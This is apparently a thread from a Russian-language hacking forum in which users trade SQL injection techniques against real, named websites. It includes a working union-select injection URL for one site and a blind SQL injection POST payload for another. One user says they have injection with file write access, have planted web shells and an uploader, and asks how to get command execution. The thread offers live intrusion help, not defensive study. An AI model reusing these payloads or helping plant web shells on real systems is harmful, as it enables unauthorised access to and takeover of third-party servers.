Вывод.

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' and 1=2 union select * from (select "ses_jcolborn' and 1=2 union select * from (select version())d join (select 2)e join (select 3)f join (select 4)g join (select 5)h--+")a join (select 2)b join (select 3)c limit 1--+

Если нужны запятые можно в хекс.

что бы что то покрутить, нужно понимать хотя бы как оно работает

что это за минус, чудо? )

Сканировал сайт нашёл Blind SQL Injection

Сайт http://binker.org.ua/reg.html

Post запрос code=1&email=sample@email.tst&reg_referer=0&regnam e=-1' or 4 = '5

Можно ли её раскрутить ?

скорее всего стоит не Mysql, дальше не стал крутить

Вот база данный этого скрипта http://rghost.ru/51238267

Товарищи добрый день. Мне нужно протестировать пару сканеров. Не подскажите уязвимые сервисы для Винд Сервер 2003?

Приветствую всех.

есть скуль есть права могу читать и записывать файлы

но файлы php txt и т.д не создаются только html

можно создать:

1.php.html но он будит пуст

2.txt.html будит с кодом но с таким

3.html будит с кодом но с таким

почему то 2 раза записывается в файл

выполнение команд видимо не работает из за этого

позаливал кучу разных шеллов и все отображаются коряво php во всех не работают

залил аплоадер тоже с помощью него не заливают файлы никакие

подскажите как сделать правильно чтоб работали команды

//del

ага точно.

а что можно сделать ?

пароли знаю.

я насчет шелла возможно как нить залить через скулю?